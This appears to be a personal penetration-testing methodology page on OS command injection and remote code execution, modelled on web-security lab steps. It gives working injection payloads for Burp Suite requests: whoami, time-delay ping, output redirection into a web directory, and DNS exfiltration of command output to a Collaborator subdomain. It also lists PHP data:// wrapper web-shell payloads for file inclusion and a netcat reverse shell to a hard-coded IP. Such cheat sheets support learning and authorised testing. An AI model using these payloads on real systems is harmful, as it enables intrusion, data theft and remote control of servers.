🏎️My RCE / File Upload / Command injection Methodology

OS command injection, simple case

Use Burp Suite to intercept and modify a request that Calls the Function query.

One by One Modify the Every parameter in the request body, giving it the value 1|whoami.

Observe that the response contains the name of the current user.

-------------------------------------------------------------

Blind OS Command injection with time delays

Use Burp Suite to intercept and modify a request that Calls the Function query.

One by One Modify the Every parameter like email parameter, changing it to:email=x||ping+-c+10+127.0.0.1||

Observe that the response takes 10 seconds to return.

-------------------------------------------------------------

Blind OS command injection with output redirection

Use Burp Suite to intercept and modify a request that Calls the Function query.

One by One Modify the Every parameter like email parameter, changing it to:email=||whoami>/var/www/images/output.txt||

Now use Burp Suite to intercept and modify the request that loads an image of a product.

Modify the filename parameter, changing the value to the name of the file you specified for the output of the injected command:

filename=output.txt

Observe that the response contains the output from the injected command.

-------------------------------------------------------------

Blind OS command injection with out-of-band interaction

Use Burp Suite to intercept and modify a request that Calls the Function query.

One by One Modify the Every parameter like email parameter, changing it to:email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||

Right-click and select "Insert Collaborator payload" to insert a Burp Collaborator subdomain where indicated in the modified email parameter.

-------------------------------------------------------------

Blind OS command injection with out-of-band data exfiltration

Use Burp Suite to intercept and modify a request that Calls the Function query.

Click "Copy to clipboard" to copy a unique Burp Collaborator payload to your clipboard.

One by One Modify the Every parameter like email parameter, changing it to:email=||nslookup+`whoami`.BURP-COLLABORATOR-SUBDOMAIN||

Go back to the Collaborator tab, and click "Poll now". You should see some DNS interactions that were initiated by the application as a result of your payload.

-------------------------------------------------------------

RCE (Reverse shell) by Using PHP Data Wrapper in LFI Path: File=

data://text/plain;base64,<?php system($_GET['cmd']);echo 'Shell Executed Successfully!!!'; ?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgRXhlY3V0ZWQgU3VjY2Vzc2Z1bGx5ISEhJzsgPz4=
data://text/plain;base64,<?php system($_GET['cmd']);?>cmd=ls
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=cmd=ls
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bin/sh -i 2>&1|nc 192.168.102.129 5555 >/tmp/f

-------------------------------------------------------------

PreviousCommon File Upload BypassesNextCode Injection (RCE)

Last updated